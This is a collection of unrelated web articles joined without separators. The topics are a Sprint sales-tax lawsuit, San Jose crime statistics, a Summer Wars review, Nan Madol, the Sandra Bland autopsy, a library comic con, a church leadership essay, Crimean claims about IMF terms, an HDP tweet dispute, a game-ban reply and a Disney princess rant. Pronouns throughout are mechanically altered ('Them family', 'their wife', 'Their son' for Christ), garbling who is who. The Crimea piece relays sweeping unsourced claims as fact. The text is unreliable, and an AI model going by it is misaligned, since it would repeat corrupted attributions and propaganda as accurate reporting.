Since 2002, New York has required wireless carriers to collect sales tax on the full amount of flat-rate wireless plans. So if your plan is a flat $39.99/month for a certain number of minutes, Sprint was supposed to have collected state sales tax on the full amount.
But NY AG Eric Schneiderman says Sprint has spent the last seven years under-collecting by only charging tax on a smaller portion of customers' bill; not because of some math error or computer glitch, but as a deliberate attempt to keep costs low in an effort to maintain market share and remain competitive.
Schneiderman says that Sprint continued to under-collect on taxes even after the company was told it was breaking the law. Their office claims that the wireless company's bad behavior currently results in $30,000/day in taxes that are not being collected.
The AG's complaint alleges that Sprint “repeatedly and knowingly submitted false records and statements to New York State tax authorities. Sprint concealed this practice from taxing authorities, its competitors, and its customers.”
Adds Schneiderman, “By deliberately evading sales taxes, Sprint cost state and local governments over $100 million that could have been used for critical services and much needed resources that our state and its citizens need given the challenging economic times we are in.”
The lawsuit not only wants to collect on all that under-reported tax, plus oodles of penalties. It also wants that money collected in such a way that it comes out of Sprint's coffers and not customers' checking accounts.
“[T]ax dodging is not acceptable and we will use every tool in our arsenal to make sure that taxpayers' money is protected, and that honest businesses and consumers are not placed at a disadvantage for collecting and paying their fair share of taxes,” says Schneiderman.
Chuck Bell, Programs Director for Consumers Union said:
We applaud Attorney General Schneiderman's action to protect consumers, businesses and governments from illegal sales tax evasion. Companies that properly collect sales taxes, and consumers that pay them, should not be put at an unfair disadvantage for following the law. Companies must be held accountable to their consumers when they promise to collect sales taxes and fail to do so.
SAN JOSE — This year's mayor's race has been dominated by public safety on a level unseen in San Jose's modern history, with one side pushing promising trends and the other side portending scary times ahead for the country's 10th-largest city.
Election brochures that have been appearing in mailboxes and other campaigning illustrate those opposing contentions: Crime rates are either heading downward, according to Sam Liccardo's supporters, or there are crowbar-wielding masked thieves lurking at nearly every residential corner, if you believe Dave Cortese and their supporters.
So what's really happening?
A 10-year look at crime data shows property crimes in San Jose rose sharply between 2008 and 2012 before starting to dip in 2013. Statewide, there were corresponding but less dramatic ups and downs, while national trends show a consistent decline over those same years. But San Jose's violent crime rate has stayed well below state and national averages and in 2013 was the lowest of any large U.S. city, according to figures from the San Jose Police Department, state attorney general and FBI.
With property crimes, the city is leveling off from a recent peak in 2012, when its rate of 2,930.2 incidents per 100,000 residents marked the first time in at least a decade San Jose exceeded the state and national rates. There has been some relief by way of successive 10 percent decreases in 2013 and the first six months of 2014. In 2013, San Jose's property crime rate ranked sixth-lowest among the 35 U.S. cities with at least 500,000 residents, a list that includes New York City, Los Angeles, San Francisco and San Diego. But it remains far higher than many longtime residents are used to.
Violent crime in San Jose saw a similar rise and fall along with the rest of the country, though the violent-crime rate of 326.6 incidents per 100,000 residents has remained persistently below big-city peers. The city's violent-crime rate is now at its second-lowest level of the past decade, even with a 4 percent rise in the first six months of 2014.
In this political year, what the voters are really seeing is candidates who slice and dice those statistics to support their campaign, according to Greg Woods, a lecturer in the criminal justice studies department at San Francisco State University whose expertise includes criminal justice research methods.
Supporters of Councilman Liccardo, a close ally of outgoing Mayor Chuck Reed, are focusing on the recent drop in crime. Meanwhile, Supervisor Cortese, the candidate backed by the police union, is emphasizing the overall increase in property crime over the past few years.
“That's why we should view this data critically. In a vacuum, statistics don't do anything — it's in how you use those numbers,” Woods said. “It's playing with fear. It's not about two plus two equaling four, it's about emotions.”
A particularly vivid example came when Reed recently put out a news release boasting a 70 percent drop in violent gang crimes through the first nine months of this year. Upon closer scrutiny, it became clear the percentage was so high because the first month of the year had the worst numbers and the ninth month had the best; the numbers in the intervening months did not substantiate the trend Reed cited. A more reliable comparison, which Reed said they were warned against doing because of data limitations, shows the drop to be closer to 15 percent.
Woods noted that property crimes have outpaced violent crimes in the public consciousness because of the economic profile of San Jose, where homeownership is relatively common.
“When you have high percentages of the population that own things, high property crime is going to be more meaningful to them,” Woods said.
San Jose is not alone in seeing fluctuations, particularly the elevated property crime rate that parallels a similar upward trend in California, although the city's increase prior to 2013 was somewhat more pronounced. Law-enforcement and civic leaders throughout the state have attributed the rise at least in part to “realignment” policies instituted by the Legislature and governor in 2011 that allowed early release for offenders convicted of certain nonviolent crimes — often property crimes — in response to court orders to relieve prison overcrowding.
Many cities in the state have also cut police staffing amid budget tightening and contentious pension reform efforts. That is probably most evident in San Jose, which in six years has gone from 1,400 officers to just over 1,000. The police union and its allies contend the result has been lagging police response times, deflating residents to the point where they are reporting nonviolent crimes less frequently. Arrests have also dropped by half in the same time frame.
Woods said it leads to a paradox that becomes difficult to quantify. When people feel unsafe, what's changing: the level of crime or our awareness of it?
“Usually it's pretty simple: The more police you have in the community, the less crime there is in the community,” Woods said. “Are we only perceiving more crime because there are more cops on the street, or seeing less of it because we have fewer cops on the street?”
Perception may be the most important factor in the political debate over crime. For several years in the 2000s, San Jose was second lowest, after New York City, in property crimes per capita among large U.S. cities. At the time, San Jose was routinely lauded as the safest large city in the country. Property crime has generally risen since then, and residents have noticed.
“If one of the reasons people live here is that it's a safe city, and crimes against people go up, it might not be the worst city, but considering where it was, there are expectations,” said Larry Gerston, a longtime San Jose State political science professor and analyst. “Unfortunately, when you gain a reputation for something, it's a lot easier to lose it.”
Contact Robert Salonga at 408-920-5002. Follow them at Twitter.com/robertsalonga.
I was stupid lucky enough this Friday to make the 400+ mile round journey up north to the Leeds International Film Festival for the day. Given the length of the journey and the insane price of train tickets here in the UK that might seem a bit excessive to catch a couple of movies, but the festival's anime weekend was being kicked off by an unmissable double bill. First off was Mamoru Oshii's lost, experimental classic Angel's Egg (more on that to follow), being shown in the UK for the first time in over 20 years, but the real incentive for me was to see the UK premiere of Momoru Hosoda's latest blockbuster Summer Wars.
Hosada has already made big waves with their 2006 hit The Girl Who Leapt Through Time – the charming sci-fi comedy-drama that touched the hearts and imaginations of both critics and audiences and earned a place in my list of 10 anime films to see before you die – and as ever following up such a renowned piece of work is a tough challenge. Set in an alternate 2010, the film centers around 17 year old otaku Kenji Kosio, a socially inept maths genius, who spends most of their waking hours immersed in the virtual reality world Oz, the ultimate convergence of communication technologies that has fused social networks, online games, telephone systems and just about every other form of internet related activity into a single, all encompassing interface. Shocked one day to be invited by their unrequited crush Natsuki Shinohara to go and stay with them and their family in Nagano over the summer, Kenji nervously agrees, believing they are going to lend a helping hand with the grand celebrations for Natsuki's grandmother's 90th birthday. Which is why they are even more shocked when they are introduced on arrival as Natsuki's fiancee, the girl wanting to assure their aging grandmother that they are happy. While watching them clumsily take on the part we are also introduced to Natsuki's huge extended family in another fantastic display of Hosoda's ability to portray realistic, everyday characters with humanity and humour. It was the hallmark of TGWLTT, and here Hosoda does it again with apparent ease and flourish, especially considering the scale of the cast they have chosen – I can't remember another anime film that effortlessly portrays so many fleshed out, convincing characters without once resorting to easy stereotypes. While certain archetypes have obviously been chosen – the insolent, black-sheep-of-the-family-uncle, the prissy aunt and the moody, reclusive video gaming teenager are all here – not once throughout the course of the story does Hosada leave you in any doubt that this are real people, with emotions and depth beyond their initial two-dimensional appearances.
Also as with The Girl Who Leapt Through Time, just when Hosoda has lulled you into believing it may be just another, all be it exquisitely crafted, romance tinged family comedy, they remind you of Summer Wars‘ science fiction roots. On the first night at Natsuki's family home, as the embarrassed Kenji is trying to catch some sleep, they receive an anonymous text message inviting to them to solve a complex maths code. Unable to resist the challenge they stay up till dawn trying to solve the puzzle, only to wake for breakfast – in one of the films most amusing sequences – and find themselves the main story on the TV news. It turns out that they have not only inadvertently helped someone hack Oz' highest level security systems, but also allowed them to frame them for it. Suddenly Kenji has to not only convince Natsuki's family that he's not a cyber-terrorist, but also try to enlist their help in stopping the mysterious hacker before the damage to Oz has devastating consequences for the real world.
Summer Wars isn't a film heavy on subtext or philosophy, with its perhaps most obvious theme being modern society's over-reliance on technology, but elsewhere Hosoda seems to have something to say about the nature of families and relationships in the internet age. To say it is about virtual communities versus real families would be an over simplification, and certainly they don't want to take sides – even while Kenji is envious of Natsuki's close knit clan, we are subtly reminded that family life is never perfect, and how non-biological bonds can often be the strongest. It is tempting to see this as a response to Miyazaki's outspoken comments on the detrimental effects of the virtual world, especially in light of Hosada's short-lived career at Ghibli, but in reality the director is refusing to preach at all, the main message here being that strength and happiness lies in the bonds between individuals, and the nature of the connection – digital or analogue, blood or friendship – is ultimately immaterial.
Visually the film is as stunning as could have been hoped for after the subtle splendor of TGWLTT. The character design is immaculate throughout, with Yoshiyuki Sadamoto again not resorting to generic or stereotyped work despite the unusually huge cast. Similarly the background work is exquisite, and instantly reminiscent of the best of Makoto Shinkai's productions, and elsewhere TGWLTT's eye for subtle slapstick makes a welcome, occasional return. However where the film really grabs the attention is in the depiction of the virtual world Oz. Those that remember the brief, stylish CGI time leap sequences from Hosoda's last film will recognize the basic aesthetic feel, but here influences from video games, anime, consumer GUI and Japanese mascot design are drawn together to make a frenetic, futuristic but utterly believable environment populated by avatars that somehow look both cutting-edge and all-too familiar.
Perhaps the film's only weakness is its only briefly explored backstory as to the identity of the mystery hacker. I won't reveal the answer here, but it's a cyberpunk standard familiar from everything from Neuromancer through Ghost in the Shell to Denno Coil – the later, incidentally being a work that Summer Wars seems to give a noticeable nod of acknowledgment to. Both Madhouse productions seem to want to achieve the unlikely pairing of VR techno-thriller and Ghibli-esque family adventure, and while both succeed, there's no denying Summer Wars does it in a more big-budget blockbuster style. And I mean that as a compliment; while it may be louder and more colorful than the The Girl Who Leapt Through Time, at its heart still lies a similarly subtle, intelligent and touching film. As such Summer Wars is a rare treat, and one you should enjoy as soon as you can.
“In their house at R'lyeh, dead Cthulhu waits dreaming”
Off the coast of a remote Micronesian island lay the ruins of a once-great city of human-made stone islands that inspired the city of R'lyeh in H. P. Lovecraft's Cthulhu Mythos.
Impressive in their own right, these ruins represent the remains of megalithic architecture on an unparalleled scale in Micronesia.
Evidence of the earliest human activity dates back to the first or second century BC. The construction of artificial islets started probably about 8th and 9th century AD. However, the megalithic structures were built in period of 12th to 13th century, about the same time as the stone construction of the Cathedral of Notre Dame in Paris, or Angkor Wat in Cambodia.
The complex of Nan Madol is constructed on a series of artificial islets in the shallow water next to the eastern shore of the Pohnpei island. The site encloses an area approximately 1.5 km long by 0.5 km wide and it contains nearly 100 artificial islets.
Nan Madol seems to have housed the ruling elite caste of Saudeleur dynasty. It was a political and ceremonial seat of power. As a means of control of their subjects Saudeleur dynasty had succeeded in uniting the clans of Pohnpei. The rulers forced local chieftains to leave their home villages and move to the city where their activities could be more closely observed.
Most of the islets served as residential area, however some of them served special purpose, such as food preparation, coconut oil production or canoe construction. Madol Powe, the mortuary sector, contains 58 islets in the northeastern area of Nan Madol. The centerpiece of the whole complex is the royal mortuary at the islet of Nandauwas, with its 7.5m high walls surrounding the central tomb enclosure.
The population of Nan Madol was probably more than 1000 at a time when whole population of Pohnpei barely reached 25,000. There are no sources of fresh water or possibilities to grow food on Nan Madol so all supplies had to be brought in from the mainland. The population of the city probably included a large number of commoner servants.
Nan Madol is the biggest center of the culture which left numerous other megalithic structures scattered on neighboring shores and on main island of Pohnpei; it all can be found in the area of about 18 square kilometers.
According to local legend, the stones used in the construction of Nan Madol have been flown to the location by means of black magic. Archeologists have located several possible quarry sites on the main island, however the exact method of transportation of construction material is still not determined.
Lovecraft used the story of the ruins as the basis for their R'lyeh, a fictional sunken city and home to Cthulhu, appearing in the short story “Call of Cthulhu”, as described as: “The nightmare corpse-city of R'lyeh … was built in measureless eons behind history by the vast, loathsome shapes that seeped down from the dark stars. There lay great Cthulhu and their hordes, hidden in green slimy vaults … until the end.”
The real island of Pohnpei is also mentioned in the story.
Nan Madol had been abandoned by the time the first Europeans arrived, early in the 19th century, most likely declining at the time of the fall of the Saudeleur Dynasty in about 1450. Some have claimed that the ruins are the lost islands of Lemuria, although there is no scientific backing for this claim (or, for that matter, for the existence of Lemuria at all).
The autopsy of a black woman who was found dead in a Texas jail revealed no injuries that would suggest they were killed by someone else, authorities said Thursday.
Waller County prosecutor Warren Diepraam said the autopsy showed that 28-year-old Sandra Bland had no defensive injuries on their hands that would typically indicate a struggle.
Some lacerations or abrasions were found on their wrists. Those were consistent with a struggle while being handcuffed. The marks around Bland's neck were consistent with a suicide by hanging, Diepraam said.
Bland also had about 30 small cuts on their wrist that were probably self-inflicted within the last few weeks, they added.
They were arrested in a traffic stop three days before they were found in their cell on July 13. Them family and friends dispute the official finding that they killed themselves using a noose fashioned from a plastic garbage bag.
Texas Rangers and the FBI are investigating.
Also Thursday, the woman's sister confirmed that Bland had taken prescription medication for seizures in the past.
Booking documents filled out for Bland after their arrest indicate they told staff at the jail that they had epilepsy and was taking medication for it. The forms identify the drug as Keppra.
Other forms, however, say they were not taking medication.
Company information on Keppra, which is sold in regular and extended-release forms, says that "antiepileptic drugs, including Keppra and Keppra XR, may cause suicidal thoughts or actions in a very small number of people, about 1 in 500."
Sharon Cooper told The Associated Press that their sister suffered from seizures about a decade ago but had not had any in recent years and was not on medication.
The medication was not the only inconsistency in the jail-intake papers. One questionnaire said Bland took pills in 2015 in an attempt to kill themselves after losing a baby. A separate form filled out by another jail employee said the suicide attempt occurred in 2014.
Cooper said their sister had a miscarriage in May 2014, but got through it. Cooper also said they were not aware of any suicide attempt.
Asked if their sister could have been getting treatment without relatives knowing, Cooper said the family's five sisters were "above board" with each other and, if anything, "overshared."
Preliminary autopsy results found no injuries consident with a violent homicide and also found marijuana in Sandra Bland's system. Bland's family has obtained an independent autopsy. (WGN-TV) Preliminary autopsy results found no injuries consident with a violent homicide and also found marijuana in Sandra Bland's system. Bland's family has obtained an independent autopsy. (WGN-TV) SEE MORE VIDEOS
"If it was happening, I would have known," they said.
Preliminary results of an independent autopsy arranged by the family showed bruising to deep muscle tissue in Bland's back, consistent with the officer having their knee there, Cooper said.
They would not say if there were other findings. Full results won't be in for a couple of weeks.
A woman who occupied a jail cell next to Bland said the Chicago-area woman was emotional and wept often during their three days in jail.
Alexandria Pyle told Houston television station KTRK that Bland was "sort of distraught" that a friend had not come to bail them out of jail. They said Bland told them they "was not equipped" for incarceration and thought they were the victim of an injustice.
Pyle said they heard no signs of a struggle in the cell.
Preliminary results of the Texas autopsy also showed that Bland had marijuana in their system. The drug-test results are worth noting because they could be "relevant to their state of mind," Diepraam said.
Authorities said any contradictions in the jail documents were the result of Bland's inconsistent answers to jailers' questions.
Bland's death comes after nearly a year of heightened national scrutiny of police and their dealings with black suspects, especially those who have been killed by officers or die in police custody. It has resonated on social media, with posts questioning the official account and featuring the hashtags #JusticeForSandy and #WhatHappenedToSandyBland.
Bland's family has said they were not despondent and was looking forward to starting a new job at their alma mater, Prairie View A&M University.
However, Bland posted a video to their Facebook page in March, saying they were suffering from "a little bit of depression as well as PTSD," or post-traumatic stress disorder.
Cooper said that "everyone has peaks and valleys" and that the Facebook video might indicate their sister was just having a bad day or a bad few days.
A video of their arrest taken from the officer's dashcam shows state trooper Brian Encinia drawing a stun gun and threatening Bland when they refuse to follow their orders.
The episode began when the trooper stopped Bland for failing to signal a lane change.
The conversation turned hostile after the officer asked Bland to put out their cigarette and they asked why they can't smoke in their own car. The trooper then ordered Bland to get out of the vehicle. They refused, and they told them they were under arrest.
The roadside encounter swiftly escalated into a shouting confrontation, with the officer threatening to drag them out of the car. At one point, they warned Bland, "I will light you up."
The trooper, who has been on the force for just over a year, has been placed on administrative leave for violating unspecified police procedures and the department's courtesy policy.
Associated Press
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-5', placement: 'Interstitial Gallery Thumbnails 5', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-10', placement: 'Interstitial Gallery Thumbnails 10', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-15', placement: 'Interstitial Gallery Thumbnails 15', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-20', placement: 'Interstitial Gallery Thumbnails 20', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-25', placement: 'Interstitial Gallery Thumbnails 25', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-30', placement: 'Interstitial Gallery Thumbnails 30', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-35', placement: 'Interstitial Gallery Thumbnails 35', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-38', placement: 'Interstitial Gallery Thumbnails 38', target_type: 'mix' });
Image 1 of / 39 Caption Close Image 2 of 39 Brotherhood of Evil Geeks podcasters Brotherhood of Evil Geeks podcasters Image 3 of 39 Image 4 of 39 Dan Hosek Image 5 of 39 Image 6 of 39 Gregg Schigiel Image 7 of 39 Image 8 of 39 Image 9 of 39 Shane Moore Image 10 of 39 Image 11 of 39 Jess Fink Image 12 of 39 Image 13 of 39 Image 14 of 39 Image 15 of 39 Image 16 of 39 Keynote Presenter Chris Giarusso Keynote Presenter Chris Giarusso Image 17 of 39 Image 18 of 39 Image 19 of 39 Image 20 of 39 Image 21 of 39 Richard Bonk Image 22 of 39 Image 23 of 39 Image 24 of 39 Melody Often Image 25 of 39 Image 26 of 39 Image 27 of 39 Markus Anderson and their wife Jen Wojtowicz, Markus Anderson and their wife Jen Wojtowicz, Image 28 of 39 Image 29 of 39 Superman in a phone booth, eating pizza, with a turtle, while it is raining tacos outside Superman in a phone booth, eating pizza, with a turtle, while it is raining tacos outside Image 30 of 39 Image 31 of 39 Image 32 of 39 A hedgehog, wearing a hat and magic slippers, while waterskiing on lava A hedgehog, wearing a hat and magic slippers, while waterskiing on lava Image 33 of 39 Image 34 of 39 Image 35 of 39 Image 36 of 39 Image 37 of 39 Image 38 of 39 Image 39 of 39 Recaps of Electric City Comic Con @ the Schenectady Public Library 1 / 39 Back to Gallery
This weekend there were at least two Comic Conventions going on that I knew of…the Electric City Comic Convention hosted by the Schenectady County Public Library…and some small, no name one out on the west coast.
Prior to the show, I was unsure what to expect when I arrived.
I was pleasantly surprised at what I found. I arrived around 11:30 (had to take my new puppy, Odin, out for a walk before it got to humid). As I drove up the street and parked across from the library I saw that the Comics Common was full of attendees including some cosplayers. I began by walking around the Comics Common checking out the few vendors and saying hello to the Brotherhood of Evil Geeks podcasters who had setup on the library patio.
After a brief chat with the Evil Geeks crew I headed into the library to check out and talk with the creators. I had some great conversations with Jess Fink about their OGN We Can Fix It, (which I read last week), Gregg Schigiel (Pix), Shane Moore, artists Richard Bonk, Melody Often and Dan Hosek. I even had a chance to briefly talk with Chris Giarrusso, as I didn't want to take up much of their time.
I did have a chance to speak with Leah LaFera, from the library, who was responsible for putting on show:
How did the idea for the mini convention come about?
One of our artists, Shane Moore, attended a convention and sat on a panel with a group from Ann Arbor, Michigan. The group puts on a convention called “Kids Read Comics,” a comic convention just for kids, which features creators with kid friendly work, and brought the idea back to use here at the library. We immediately thought it sounded really interesting and something that we could pull off and would go well with our summer reading theme, “Every Hero Has A Story,” revolving around superheroes and comic books. We contacted the Kids Read Comics group, and replicated the templete they use for libraries to put on their own conventions. They have been really helpful with all aspects of putting on a show such as the timing of everything and finding some good caliber artists to bring. We wanted to have a good mix of creators that were child friendly but also have something for adults too.
Comics are nice because there are certain kids who don't like to read and by using comics and providing them with both a reading and visual experience. Comics are not only a great and valid art form but also can be used as a bridge for kids who don't like books and reading perse, but just haven't found something they like which can make reading more of a chore for them.
That is one of the reasons I am glad Chris Giarrusso, creator of G-Man is here. Chris' comics are one of those comics I have always tried to put in the hands of young boys, letting them know that they need to read these. Most of the time they come back and say they loved the book and wonder what more they can read that is similiar. G-Man is funny, action filled, relatable, and they just writes really well for kids.
You have a nice representation of local artists…
We were really surprised as to how many creators there were in the area such as Jess Fink (We Can Fix It from Top Shelf) and Richard Bonk, in fact once word got out we had creators approaching us.
So do you read comics?
I do, but not as much as I used to. Now that I do book discussions and my professional duties with the library, I am more into novels now. My favorite comic was Jeff Smith's BONE, I started reading it as a teenager. I remember going to the comic stores and try and fill in my collection, which I still have in a big box. I know I should do something with them, especially since they have the collected compendium of the whole series.
I just finished the second volume of Chip Zdarsky's Sex Criminals and really loving that
Are there plans to do something like this again?
Yes, we just wanted to see how today was going to go and see if there was going to be an interest from the public. We are happy that a lot of kids came out, we really wanted families, but also an event that had an adult appeal.
—
I attended the Quick Draw! Panel which was a lot of fun. The idea for this panel was that the artists, Markus Anderson and their wife Jen Wojtowicz, would have a set time to to complete a sketch based on suggestions from the audience. This type of panel is one of my favorites to watch, the fact that the suggestions for the sketches came from kids made it even better. I mean where else could you get two different interpretations of (see gallery for final sketches):
1. Superman in a phone booth, eating pizza, with a turtle, while it is raining tacos outside
2. A hedgehog, wearing a hat and magic slippers, while waterskiing on lava
There were also some great costumes worn by the various cosplayers in attendance. I wasn't able to stay for the Costume Contest but I did see and got some pictures which I have in the photo gallery. For more pictures of Cosplayer from the Con check out the Electric City Comic Con Facebook Page
Overall I think this was a great show. It was awesome to see all the kids and families going around, talking with the creators and just having a good time while being introduced to or finding new things to read. I liked the overall vibe of the show, which was that of the smaller shows such as MoCCA Arts Fest, an annual comics festival in New York City hosted by the Society of Illustrators or SPACE (Small Publisher and Creator Expo). I like the idea of the creators being able to interact with kids and offering kid friendly books is something that the industry as a whole needs to reach the next generation of comic fans as opposed to only targeting the older already established audience (there is a complete series of posts on that topic alone but I digress). I think for a first time putting on a show like this it was the right size and looked like there was a great turnout.
I hope the SCPL sees this event as a success and the Electric City Comic Con becomes an annual event that continues to grow and focus on kids reading, getting them interested and hooked on the comics medium.
—
Tomorrow I will post some of the news that came out of that other small Comic Convention held in San Diego
Years ago as I served as bishop I was meeting with the primary president in my office. They were striving so hard to really do them calling well and make it a wonderful experience for the children of our ward. I was grateful for their dedication but was also seeing their take-charge attitude diminishing those leaders around her—specifically in their presidency. The primary president was taking it all on and was leaving no room for anyone else to make a mistake because they felt like the “buck stopped with her” and if success was going to happen in the primary they needed to guarantee it with their own efforts. I see this approach in many other leadership styles. They are afraid to delegate because those around them can only do it 80% as good as they can and what if that 20% deficit is needed to really touch the hearts of those that participate?
As the primary president and I continued to chat in my office, we were discussing a recent primary activity that hadn't gone as well as they had hoped. They tried to let others in their presidency participate through delegation and that is what they felt lowered the quality of the activity. They were frustrated the children didn't enjoy it as much as they hoped. In an effort to step back from the context of the conversation (the primary activity) and focus on the issue of reaching the highest success, I simply asked them a series of questions that at first caused them to wonder what I was doing but soon ended with a strong lesson:
Bishop: “Sister, why are you afraid of an activity that isn't successful?”
Primary President: “Because if the kids don't enjoy the primary activity they might not enjoy primary at all.”
Bishop: “Why are you afraid of the children not enjoying primary?”
Primary President: “Because then they won't want to come to church.”
Bishop: “Why are you afraid of them not coming to church?”
Primary President: “Because then they won't grow up in the gospel.”
Bishop: “Why are you afraid of them not growing up in the gospel?”
Primary President: “Because then they won't make covenants, gain deep testimonies, and stay true to the gospel.”
Bishop: “What are you afraid of if they don't stay true to the gospel?”
Primary President: “Because then they won't return to their Heavenly Father and be exalted.”
And then the lesson…
Bishop: “Since when was it your job to get them to return to Heavenly Father and be exalted?”
As Christ asked the Pharisees, “for whether is greater, the gold, or the temple that sanctifieth the gold?” (Matthew 23:17) We sometimes worry too much about the gold (the activities, the 100% visit teaching, the administration of the gospel) and lose sight of that which sanctifies the gold (the Atonement of Jesus Christ). In our leadership we must continually remind ourselves what our role is and what Christ's role is. A large part of Christ's role was to save and to make the Atonement available for justification, sanctification, and exaltation. Their role isn't made more possible by our really good primary activity, or the perfect sacrament meeting talk. We can't charm them into accepting the plan of salvation. They generally find it on their own, through their own journey. Of course, those activities, talks, lessons, and individual interactions play a role in that process, but not in a way we could ever speculate. If an activity had gone a little bit better maybe it could have reached more people and turned their hearts towards Christ, but I assure you that your mediocre activity did not disappoint the plan of our Heavenly Father. The Atonement of Their son will make up for that loss as well and capture their hearts at another opportunity.
So the next time you are administering as a leader or planning the next activity, don't hesitate to delegate the responsibilities even if you can do it better. “This thing is too heavy for [you].” [You] are not able to perform it [yourself] alone (Exodus 18:18).” Give those around you the opportunity to grow as leaders and they will learn in their own right. With good intention in your heart you do not have power to lose the souls you lead; just as much as you do not have the power to save the souls you lead. That saving has been done.
Crimea's deputy prime minister, Olga Kovitidi, described as predatory the terms of an agreement Kiev is ready to accept from the International Monetary Fund.
Crimea's deputy prime minister, Olga Kovitidi, described as predatory the terms of an agreement Kiev is ready to accept from the International Monetary Fund.
The tentative agreement with the IMF which the Ukrainian authorities signed with the IMF on March 2, says that the country's entire gas pipeline system will be handed over for free in the American company Chevron's ownership the moment the basic agreement is signed, while the owners of the Mariupol, Zaporizhzhya and Dnipropetrovsk steel mills will be obliged to surrender their 50 percent stakes to Germany's Ruhr. The Donbass coal industry will be handed over to Ruhr's subsidiary in Finland, they told Interfax on Sunday, citing media reports.
It emerged recently that Kiev has pledged to make territory available near Kharkiv to host U.S. missile defense systems and a wing of American fighter jets to provide cover for the missile defense installations, they also said.
Ukraine's interim prime minister Arseniy Yatsenyuk has assured the West that Kiev will fulfill all of the IMF's terms in order to secure a loan, Kovitidi said.
The Crimean leaders have also learned that Kiev promised the West to take a package of unpopular measures in order to fill gaps in the Ukrainian budget, they said. Gas prices for municipal companies will have to be increased by 50 percent and for private will double.
Electricity tariffs will be raised by 40 percent, housing utility tariffs will be raised, too, gasoline excises will go up 60 percent and transportation tariffs 50 percent, while state support for childbirth will be cancelled, the free distribution of textbooks will be annulled at schools and the VAT relief will be scrapped in rural regions, they said.
Concurrently, VAT will be introduced on medications, which will push up prices and bring citizens' living standards down," Kovitidi said.
"The planned annulment of the moratorium on the sale of farmland looks appalling. The selloff of Ukraine's black soil zone, including to foreign countries, may have disastrous economic and social consequences," they said.
Kovitidi said that the Crimean legislature's decision to hold a referendum on March 16 was correct.
"The recent developments in Ukraine and the decisions being made have a direct bearing on the people of Crimea, who must know the truth and decide their own and their children's future in a referendum," they said.
Following consultations with the Ukrainian prime ministers and representatives of the economic bloc of the Ukrainian government in Kiev on March 6-7, the International Monetary Fund (IMF) stated its readiness to provide assistance to the people of Ukraine and support the economic program of the Cabinet of Ministers, the IMF said in a press release.
All rights reserved by Rossiyskaya Gazeta.
The Pro-PKK Peoples' Democratic Party (HDP) on Sunday falsely accused the Turkish military of setting "large swathes of forests" on fire on their official Twitter account.
Sharing photos from the wildfire in Turkey's western Antalya province that happened on the same day, HDP's tweet also claimed that the Turkish military razed mountain villages in Kurdish regions.
A similar tweet of the pro-PKK Dicle News Agency (DIHA) also suggested that the Turkish military was involved in setting a forest in the southeastern Lice district of the Diyarbakır province on fire.
Foreign Minister Mevlüt Çavuşoğlu reacted to the accusations with a tweet saying "Dirty propaganda has no limits: PKK & its affiliates try to portray forest fire in Kumluca as if it happened in Lice."
Dirty propaganda has no limits: PKK & its affiliates try to portray forest fire in Kumluca as if it happened in Lice pic.twitter.com/PdhhsLL1Bj — Mevlüt Çavuşoğlu (@MevlutCavusoglu) June 26, 2016
HDP only made an apology on the Twitter account after Çavuşoğlu's reaction and claimed that the tweet was sent by mistake, although tens of tweets replied before Minister Çavuşoğlu, stressing that the images displayed were from Antalya and not from Lice.
The slandering tweet was not removed from the account after the apology.
Posted by dYw
It should be sent within the next 24 hours. If you'd prefer, I can clarify what the ban was for you in this thread.
You can clarify it here, I'd like to clear this up as soon as possible.
A third party program is any file or program that is used in addition to the game to gain an unfair advantage. These programs may increase movement speed or teleport heroes from one place to another beyond what is allowed by game design. It also includes any programs that obtain information from the game that is not normally available to the regular player or that transmit or modify any of the game files.We take action against accounts using hacks when a hero on the account is identified using a hack program. Hacks provide benefits normally not achievable in the game. Such benefits may include: increased speed, teleportation, or running through walls.We take action against accounts using automation programs or bots when one or more heroes on the account are identified using a bot to achieve automation.
Anyone who has raised girls probably at one point in time will encounter Disney's propaganda machine about being a Princess. A mooching, useless, gold-digging Princess.
Life has been good to me in the fact that my two girls care for none of that crap. They'd rather dig for worms in the backyard and hunt for frogs. And there is not a day that goes by that I do not thank the good Lord above for saving me from Disney's plastic princess hell. One of my nieces has a real princess fetish. So I asked their point blank, “so, what do princesses actually do all day?”. The reply? “Look in the mirror, do their hair and dance”. The next generation of gold-diggers has been supplied courtesy of Disney to provide inspiration for tomorrows Kanye Wests.
Why even bring it up? Seems Disney has officially pulled the plug on princess movies considering how socially obsolete they are. The genre has run its course as a princess is now synonymous with idle living, sex scandals, and uh…Fergie. For giggles, lets quickly run down the list of Disney “examples” over the last few decades:
In the last decent Disney fairy tale, Beauty and the Beast, Belle was able to see past Beast's looks and abusive mannerisms for their true value: a big castle and a massive real estate portfolio.
That harpie mermaid Ariel married a guy after having knowing them for three days. I'm sure their royalty had nothing to do with it.
Sleeping Beauty set new standards in date-rape drugs.
Snow White had less common sense that an Enron boardroom to shack up with 7 obsessive compulsive midgets ( sorry, short people ) hiding in the woods who were capable of any number of deranged acts. Then the flake just up and marries some guy who kisses their lifeless body just because he's rolling in Euros.
Cinderella wore glass footwear that would never pass CSA standards for safety. Plus they were no better than their money-hungry sisters. The only difference was their looks and totally unfair access to a demi-god Godmother.
Princess Jasmine? Think burkas and Islamic law. That girl would be beheaded for leaving the castle with their belly-button showing. Sure, Aladdin had less money than me in college, but Jasmine already had that base covered thanks to the Sultan. Kind of like Archie and Veronica.
